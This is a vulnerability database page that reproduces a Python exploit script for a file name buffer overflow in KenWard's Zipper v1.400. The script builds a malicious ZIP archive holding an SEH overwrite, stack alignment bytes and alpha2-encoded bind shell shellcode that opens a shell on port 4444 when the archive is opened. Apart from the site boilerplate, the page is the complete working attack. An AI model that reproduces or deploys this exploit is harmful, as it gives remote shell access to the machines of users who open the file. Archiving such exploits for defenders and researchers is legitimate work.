Vulners
Lucene search
KenWard's Zipper v1.400 Buffer Overflow - Method 2
#!/usr/bin/python
## KenWard's Zipper v1.400 File Name Buffer Overflow
## Coded by sinn3r (x90.sinner{at}gmail{d0t}com)
## Tested on: Windows XP SP3 ENG
## Reference: http://www.exploit-db.com/exploits/11834
## Big thanks to mr_me, and corelanc0d3r.
## greetz to all the friends at Corelan Scurity Team & Exploit-DB... coolest people ever!
##
## Description:
## This exploit takes advantage of the fact too many characters get mangled, as a result
## I was able to get a shell in a more straight forward way. Very interesting exercise.
## Mr_me and tecR0c figured out this trick, of course. But I was given the honor to share it.
## Script provided 'as is', without any warranty.
## Use for educational purposes only. Do not use this code to do anything illegal.
## Zip file format based on:
## http://en.wikipedia.org/wiki/ZIP_(file_format)
local_file_header = (
"\x50\x4B\x03\x04" #Local file header signature
"\x00\x02" #Version needed to extract
"\x00\x08" #General purpose bit flag
"\x00\xDA" #Compression method
"\xA2\x48" #File last modification time
"\x3B\xF6" #File last modification date
"\x66\x18\x0D\x4E" #CRC-32
"\xEF\x0F\x00\x00" #Compressed size (payload size)
"\x14\x00\x00\x00" #Uncompressed size
"\xe4\x4f" #File name length
"\x04\x00" #Extra field length
#"\x73\x65\x63\x72\x65\x74\x73" #File name (n) ASCII "secrets"
#"\x42\x42\x42\x42" #Extra field (m)
);
central_directory_file_header = (
"\x50\x4b\x01\x02" #Central directory file header signature
"\x14\x00" #Version made by
"\x14\x00" #Version needed to extract
"\x00\x08" #General purpose bit flag
"\x00\xDA" #Compression method
"\xA2\x48" #File last modification time
"\x3B\xF6" #File last modification date
"\x66\x18\x0D\x4E" #CRC-32
"\xE4\x0F\x00\x00" #Compressed size (payload size)
"\x14\x00\x00\x00" #Uncompressed size
"\xe4\x0f" #File name length (n)
"\x04\x00" #Extra field length (m)
"\x04\x00" #File comment length
"\x00\x01" #Disk number where file starts
"\x00\x00" #Internal file attributes
"\x20\x00\x00\x00" #External file attributes
"\x00\x00\x00\x00" #Relative offset of local file header
#"\x73\x65\x63\x72\x65\x74\x73" #File name (n) ASCII "secrets"
#"\x42\x42\x42\x42" #Extra field (m)
#"\x43\x43\x43\x43" #File comment (k)
);
end_of_central_directory_record = (
"\x50\x4B\x05\x06" #End of central directory signature
"\x00\x00" #Number of this disk
"\x00\x00" #Disk where central directory starts
"\x01\x00" #Number of central directory records on this disk
"\x01\x00" #Total number of central directory records
"\x12\x10\x00\x00" #Size of central directory (central directory size + payload)
"\x02\x10\x00\x00" #Offset of start of central directory, relative to start of archive (lfh + payload)
"\x00\x00" #Zip file comment length (n)
);
## Align EAX for the base address of the alpha2 encoded bindshell
alignEAX = (
"\x05\x10\x7E\x10\x7E" #ADD EAX, 0x7E107E10
"\x05\x09\x75\x01\x7E" #ADD EAX, 0x7E017509
"\x05\x02\x03\x01\x04" #ADD EAX, 0x04010302
"\x72\x07"+ #JB jump over the bytes we can't overwrite
"\x41"*12 #NOPs
);
## windows/shell_bind_tcp lport=4444 exitfunc=seh
## alpha2 eax --uppercase 744 bytes
shellcode = ("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS03PK"
"9ZE6QN2CTLK0RVPLKPR4LLKQBTTLKSBVH4ONWQZVFFQKOFQO0NLGL3QSL4BVLQ0YQXO4MUQIWKRJPF2QGLKPRB0"
"LKPBGLEQ8PLK70RXMUO0BTQZEQHPPPLK78TXLK687PS1XSM37LPILKWDLKUQ8V6QKO6QYPNL9Q8OTMEQ9WFXKPT"
"5ZT33SMJX7KCM14CEZB1HLKPXWTUQN3SVLKTLPKLKV85LEQXSLK34LKS1HPK9W47TQ4QK1KSQQI0Z0QKOM0PXQO"
"QJLKTRJKK61MSXVS02EP5PCXBW3CFRQOF4SXPLT77VDGKO9EX8LPS1UPS0WYO4F4PP3X7YMP2KS0KOHUV00P0P6"
"0QPV01PPPRHJJTOIOKPKON5MYO7FQYK0SSXS2S0TQQLMYKVSZB0PVPW3XO2YK7GCWKO8UPSPWE8X7KYWHKOKOHU"
"QCV3PWSX2TJLGKKQKON5V7MYHG58BU2N0M3QKON52HRCBM54UPMYKS0W67676QL62JTRPYPVKRKMSVO774WTWLU"
"QUQLM0DGTB0O65PPD0TV0PV0V0VQVPVPNPV1FQC66SXT9XLWOLFKOYEK9M0PNV6QVKOFPCXUXK75MSPKON5OKKN"
"TNP2ZJBHY6LUOMMMKON5WLUV3L5ZK0KKKPRUC5OKW74S2R2ORJ5PPSKO8UUZA")
## 4064+4 bytes
## Pointer to next SEH record: 1022 bytes
## SE handler : 1026 bytes
payload = (
"\x41"*(1017-len(alignEAX)-len(shellcode))+ #Padding
alignEAX+ #Align EAX for the bindshell
shellcode+ #Bindshell lport 4444
"\x82\x85\x81\x98\x98" #This will get mangled and become "\xE9\xE0\xFC\xFF\xFF"
"\x73\x97\x42\x42" #JNB 0x97 = JNB 0xF9 = Same as EB 0xFB = Rewind 5 bytes
"\x7E\x27\x41\x00"+ #POP POP RET = 0x0041277E
"\x44"*3034+ #Padding
".bin" #Fake name
);
## Create the ZIP structure with our payload
zip = (
local_file_header +
payload +
central_directory_file_header +
payload +
end_of_central_directory_record
);
f = open("sploit.zip", "w")
f.write(zip)
f.close()
print "[*] Local file header size = 0x%x" %len(local_file_header)
print "[*] Central directory file header size = 0x%x" %len(central_directory_file_header)
print "[*] End of central directory record size = 0x%x" %len(end_of_central_directory_record)
print "[*] Payload size = %s bytes" %len(payload)
print "[*] sploit.zip created. Open it with KenWard's Zipper."
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Mar 2010 00:00Current
7.1High risk
Vulners AI Score7.1